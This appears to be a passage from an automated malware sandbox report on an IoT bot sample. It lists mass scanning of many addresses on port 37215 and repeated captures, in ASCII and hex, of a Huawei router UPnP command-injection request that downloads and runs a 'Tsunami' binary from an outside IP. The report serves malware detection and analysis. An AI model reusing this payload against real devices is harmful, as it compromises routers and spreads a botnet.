    Source: unknownNetwork traffic detected: HTTP traffic on port 48822 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41768 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42430 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36036 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38270 -> 55555
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.115.21.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.74.57.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.199.95.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.49.81.24:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.223.242.185:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.187.117.78:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.155.250.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.187.60.28:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.93.230.148:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.168.107.99:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.193.73.198:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.104.245.89:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.70.247.116:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.180.173.91:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.28.76.226:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.13.254.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.90.34.47:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.15.236.140:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.53.6.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.120.237.177:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.176.1.82:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.125.186.32:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.2.158.114:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.133.215.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.79.242.191:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.31.96.161:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.84.12.76:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.232.19.104:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.232.156.209:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.71.221.165:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.3.30.6:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.165.63.52:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.71.43.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.47.55.54:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.244.22.149:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.79.116.116:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.213.195.173:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.205.123.216:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.163.14.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.213.54.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.154.146.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.170.195.147:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.35.45.211:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.88.3.54:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.63.211.93:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.167.5.185:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.2.201.1:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.142.95.164:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.131.210.236:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.163.217.221:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.133.163.25:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.158.220.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.38.149.17:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.64.166.220:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.9.71.106:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.215.156.161:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.246.101.98:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.12.228.180:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.252.132.236:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.163.223.51:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.28.51.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.182.59.123:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.220.98.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.231.175.141:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.17.179.206:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.149.254.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.174.64.209:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.30.103.71:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.182.14.13:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.224.170.19:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.18.28.224:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.184.131.61:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.201.165.194:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.253.171.133:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.139.115.86:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.34.198.133:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.253.20.21:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.145.216.40:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.93.111.130:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.184.11.111:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.104.241.136:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.227.162.155:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.78.238.14:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.206.230.233:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.227.153.133:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.89.5.97:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.62.199.12:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.58.218.57:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.4.227.224:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.93.180.124:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.40.220.184:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.111.93.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.6.61.118:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.39.179.55:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.79.57.95:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.151.124.168:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.209.205.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.91.217.93:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.129.128.233:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.3.10.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.208.167.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.92.186.161:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.131.171.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.127.173.27:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.204.29.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.198.96.1:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.246.252.223:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.61.79.61:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.146.235.99:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.45.41.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.137.6.143:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.192.27.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.104.75.163:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.67.3.201:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.229.119.202:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.142.110.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.101.2.184:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.242.110.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.143.243.38:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.36.196.52:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.184.12.184:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.245.89.44:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.241.68.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.198.75.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.204.180.214:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.97.36.53:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.15.142.178:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.243.253.255:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.221.118.149:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.246.215.213:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.143.187.100:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.134.50.64:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.15.248.9:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.51.124.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.2.112.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.132.248.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.9.231.207:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.143.211.216:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.61.208.166:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.6.101.133:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.158.18.192:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.83.43.2:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.146.181.254:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.138.138.249:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.7.203.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.17.51.47:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.72.47.185:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.101.40.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.95.166.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.100.144.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.202.207.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.137.74.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.20.178.31:37215
    Source: /usr/sbin/sshd (PID: 5272) Socket: [::]::22
    Source: /lib/systemd/systemd-resolved (PID: 5285) Socket: 127.0.0.53::53
    Source: /usr/lib/xorg/Xorg (PID: 5742) Socket: <unknown socket type>:unknown
    Source: /usr/bin/dbus-daemon (PID: 5795) Socket: <unknown socket type>:unknown
    Source: /usr/sbin/sshd (PID: 5855) Socket: [::]::22
    Source: /lib/systemd/systemd-resolved (PID: 5858) Socket: 127.0.0.53::53
    Source: /usr/lib/xorg/Xorg (PID: 6258) Socket: <unknown socket type>:unknown
    Source: /usr/bin/dbus-daemon (PID: 6283) Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd (PID: 6254) Socket: <unknown socket type>:unknown
    Source: /usr/sbin/sshd (PID: 6312) Socket: [::]::22
    Source: /lib/systemd/systemd-resolved (PID: 6315) Socket: 127.0.0.53::53
    Source: /usr/lib/xorg/Xorg (PID: 6719) Socket: <unknown socket type>:unknown
    Source: /usr/bin/dbus-daemon (PID: 7540) Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-resolved (PID: 6731) Socket: 127.0.0.53::53
    Source: /usr/sbin/sshd (PID: 6992) Socket: [::]::22
    Source: /lib/systemd/systemd-resolved (PID: 7143) Socket: 127.0.0.53::53
    Source: /usr/sbin/sshd (PID: 7407) Socket: [::]::22
    Source: global traffic
    HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
    Content-Length: 430
    Connection: keep-alive
    Accept: */*
    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
